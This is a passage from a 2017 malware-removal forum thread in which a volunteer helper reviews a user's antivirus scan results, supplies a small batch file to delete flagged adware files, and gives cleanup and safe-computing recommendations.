Can you tell me if there are any remaining problems.

 

Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#11 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 23 May 2017 - 09:35 AM

Hi Satchfan, good call.  As directed, scanned, but not cleaned yet.

 

 

Eset results:

C:\ProgramData\Avira\My Avira\Temp\antivirus.exe    a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application    
C:\Qoobox\Quarantine\C\Users\Admin\AppData\Local\Ektion\sgbdg.exe.vir    Win32/Boaxxe.EJ trojan    
C:\TDSSKiller_Quarantine\21.05.2017_16.10.27\susp0000\file0000\tsk0000.dta    Win32/Boaxxe.EJ trojan    
C:\TDSSKiller_Quarantine\21.05.2017_16.10.27\susp0001\file0000\tsk0000.dta    Win32/Boaxxe.EJ trojan    
C:\Users\All Users\Avira\My Avira\Temp\antivirus.exe    a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application    
C:\Windows\SysWOW64\Adobe\Shockwave 12\gt.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    

 

 

Attached Files



#12 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 03:34 PM

Let's get rid of those.

 

Please copy all text in the code box below and paste it into Notepad:

@echo off
del /f /s /q "C:\ProgramData\Avira\My Avira\Temp\antivirus.exe”
del /f /s /q “C:\Users\All Users\Avira\My Avira\Temp\antivirus.exe”
del /f /s /q "C:\Windows\SysWOW64\Adobe\Shockwave 12\gt.exe”
del %0
  • save the Notepad file to your desktop and name it delfiles.bat
  • save type as "All Files"
  • on your desktop, double-click on delfiles.bat to run it, (a black CMD window will flash, then disappear - this is normal).

The files/folders, if found, will have been deleted and the "delfile.bat" file will also be deleted.

The rest of the Online scan is only reporting backups created during the course of previous fixes: C:\Qoobox\Quarantine\, and/or other quarantined files that can't harm you unless you choose to perform a manual restore. Whatever is in these folders can't cause any harm and will be removed when we tidy up.

Can you tell me if there are any more problems.

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#13 Windfarm

Windfarm
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:06:57 AM

Posted 23 May 2017 - 05:13 PM

Thanks Satchfan.  Ran the batch file - no issues.

 

 

So far as I can tell there are no additional problems, no signs of infection and no unexpected behavior.



#14 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 23 May 2017 - 05:26 PM

Glad all seems good.

 

It's late here now so won't reply further tonight.

 

If I hear nothing else regarding problems I'll send instructions to tidy up the tools we've used in the morning, (GMT).

 

Satchfan


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#15 satchfan

satchfan

  • Malware Response Team
  • 2,785 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:12:57 PM

Posted 24 May 2017 - 05:34 PM

As I’ve heard nothing, I’ll assume that all is well.

Now that you’re free from malware, as long as it seems to be running well, please follow these steps to tidy up your computer and decrease the likelihood of getting infected again:

Enable System Restore

  • According to your log, System Restore was disabled. Please check that it is enabled:
  • click on Start, right-click on Computer and then click on Properties
  • in the left panel, click System protection[/b], (if you're prompted for an administrator password or confirmation, type the password or provide confirmation)
  • under “Protection Settings”, select your system disk and then click Configure
  • select Restore system settings and previous versions of files and then click OK twice.

===================================================

Uninstall Combofix

Follow these steps to uninstall Combofix

  • click START then RUN
  • now type Combofix /uninstall in the runbox and click OK.

Note the space between the X and the /, it needs to be there.

CFuninstall.jpg

  • please follow the prompts to uninstall Combofix.
  • once it's finished uninstalling itself you will receive a message saying Combofix was uninstalled successfully.

===================================================

Uninstall AdwCleaner

  • double click on adwcleaner.exe to run the tool
  • click on Uninstall
  • confirm with Yes.

===================================================

Download & run Delfix

  • download Delfix from here to remove many of the tools we've used during the cleaning process.
  • ensure “Remove disinfection tools” is checked.

Also place a checkmark next to:


o    Create registry backup
o    Purge system restore


  • click the Run button.

You can delete all other logs and programs we’ve used that are on your desktop. Just click on them and press Delete.

===================================================

Recommended programs

SpywareBlaster. SpywareBlaster protects against bad ActiveX, it immunizes your PC against them. It blocks over 11,000 bad sites and uses no resources of your computer.

======================

Update and run Malwarebytes. This really is an excellent program that you should also update and run on a regular basis, probably weekly.

======================

It’s important to keep programs up to date so that malware doesn't exploit any old security flaws.

FileHippo Update Checker is an extremely helpful program that will tell you which of your programs need to be updated.

======================

Download WOT

Web of Trust, warns you about risky websites that try to scam visitors, deliver malware or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites, helping you avoid the dangerous sites:


green if it's safe
yellow for caution
red for unsafe
 

You can download the WOT add-on for Firefox, Chrome, Internet Explorer, Opera, and Safari browsers. It does not slow down your browsing experience, it is easy to use and free. Just click “Download” and you are ready to go!

======================

MVPS Hosts file replaces your current HOSTS file with one containing well known ad sites and other bad sites. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1 which is your local computer, meaning it will be difficult to infect yourself in the future.

A couple of links with information here and here which can answer any questions you might have about installing/using it.

======================

Unchecky

Be careful when downloading free software. Many free programs come bundled with adware, many of which cause redirects/popups and verge on being malware. There is a program that automatically “unckecks” the boxes you may not notice when downloading programs.

Download and install Unchecky .

===================================================

I also recommend that you read the following:

Best Practices for Safe Computing - Prevention of Malware Infection by miekiemoes

Simple and easy ways to keep your computer safe and secure on the Internet  by Lawrence Abrams

I will keep this open for 24 hours in case you have any problems, after which I’ll close the topic.

Safe computing

Satchfan


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users